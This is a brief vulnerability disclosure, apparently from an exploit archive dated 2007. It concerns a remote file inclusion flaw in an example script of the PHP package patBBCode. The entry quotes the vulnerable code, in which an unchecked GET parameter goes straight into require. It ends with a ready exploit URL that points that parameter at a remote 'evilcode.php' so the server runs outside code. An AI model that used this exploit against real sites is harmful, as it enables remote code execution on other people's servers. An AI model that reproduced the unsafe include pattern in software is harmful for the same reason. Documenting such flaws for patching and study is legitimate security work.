26 lines
No EOL
551 B
Text
26 lines
No EOL
551 B
Text
Link to download:
|
|
http://www.php-tools.net/site.php?file=patBBCode/overview.xml
|
|
|
|
Vuln file:
|
|
examples\patExampleGen\bbcodeSource.php
|
|
|
|
Vuln code:
|
|
if( !isset( $_GET['example'] ) )
|
|
die( 'No example selected.' );
|
|
|
|
$exampleId = $_GET['example'];
|
|
|
|
ob_start();
|
|
|
|
// make the example think it's still in the right place
|
|
chdir( '../' );
|
|
|
|
// include the example
|
|
require $exampleId.'.php';
|
|
|
|
ob_end_clean();
|
|
|
|
Exploit:
|
|
examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php
|
|
|
|
# milw0rm.com [2007-11-12] |